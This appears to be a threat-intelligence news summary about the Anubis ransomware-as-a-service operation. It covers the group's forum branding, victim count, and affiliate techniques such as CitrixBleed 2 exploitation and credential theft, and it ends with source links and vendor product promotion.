The Anubis ransomware operation has grown into a structured cybercriminal ecosystem that combines public branding, affiliate recruitment, and multi-platform extortion services. Researchers linked the group’s leak sites, onion infrastructure, forum accounts, and the recurring "Anubis Media" persona into a unified operation that promoted ransomware and data-extortion offerings across underground communities including XSS, BreachForums, ReHub, and RAMP, as well as X. The group reportedly listed 83 victims between February 2025 and June 2026, sought corporate access in the United States, Canada, Europe, and Australia, and advertised support for Windows, Linux, NAS, and ESXi environments with capabilities such as privilege escalation, shadow copy removal, network-wide deployment, and multiple encryption modes.
Separate incident reporting tied Anubis-linked intrusions to practical affiliate tradecraft centered on stolen VPN credentials and exploitation of CitrixBleed 2 (CVE-2025-5777) on Citrix NetScaler appliances. In observed attacks, operators blended into normal administration by deploying legitimate remote-management tools including ScreenConnect, Zoho Assist, MeshAgent, Remotely, UltraVNC, Total Software Deployment, and mRemoteNG, then moved laterally with RDP, SMB, and PsExec. They also harvested credentials with Mimikatz, browser password exports, and ntds.dit theft, used tools such as S3 Browser, rclone, s5cmd, WinSCP, and PuTTY for exfiltration staging, and in some cases established fallback access through cloudflared, authenticated proxies, and SSH SOCKS tunnels, including activity involving Synology NAS devices.

Mallory correlates global threat intelligence with your attack surface — know if you’re exposed before adversaries strike.
8 events from the most recent confirmed update back to the earliest known activity.
The Anubis ransomware-as-a-service operation was formally announced on the RAMP cybercrime forum in February 2025 following its emergence from the late-2024 Sphinx rebrand.
Arctic Wolf observed some Anubis-linked intrusions attempting to establish alternate outbound access using cloudflared, authenticated proxies, and SSH SOCKS tunneling, including activity involving Synology NAS devices.
Across the 2026 cases, Arctic Wolf observed Anubis affiliates abusing legitimate remote administration tools for lateral movement and blending into IT activity, then using credential theft and cloud-transfer tools such as Mimikatz, rclone, WinSCP, and S3 Browser before encryption.
Arctic Wolf reported that multiple 2026 intrusions tied to the Anubis ecosystem used two main initial access paths: valid VPN credentials and exploitation of CitrixBleed 2 (CVE-2025-5777) on Citrix NetScaler appliances.
Arctic Wolf reported that the Anubis ransomware-as-a-service operation emerged from a late-2024 rebrand of Sphinx and subsequently operated through affiliates.
StealthMole reported that by June 2026, Anubis had publicly listed 83 victims and maintained a unified ecosystem of leak infrastructure, communication channels, and forum identities centered on the Anubis brand.
StealthMole found that the recurring persona "Anubis Media" was used to promote the operation’s brand, services, and recruitment efforts across XSS, BreachForums, ReHub, RAMP, and X. The group advertised ransomware and data-extortion services and sought corporate access in the United States, Canada, Europe, and Australia.
StealthMole reported that Anubis publicly listed 83 victims over the period from February 2025 through June 2026, marking the start of its visible leak-site activity in the source material.
Vulnerabilities, threat actors, malware, products, organizations, and breaches Mallory has linked to this story.
3 references tracked. Mallory keeps watching after this page renders.
thehackernews.com
Open sourcearcticwolf.com
Open sourcestealthmole-intelligence-hub.blogspot.com
Open sourceMap indicators from this story to your assets and identify affected systems in minutes.
Every observed campaign, victim, and pivot linked to actors named in this story.
Malware, exploits, and IOCs connected to the activity described here.
YARA, Sigma, and Snort rules deployed to your SIEM as soon as they’re published.
Get matching new stories delivered to your team as they break — not the next morning.
Ask questions about this story and take action on the answers.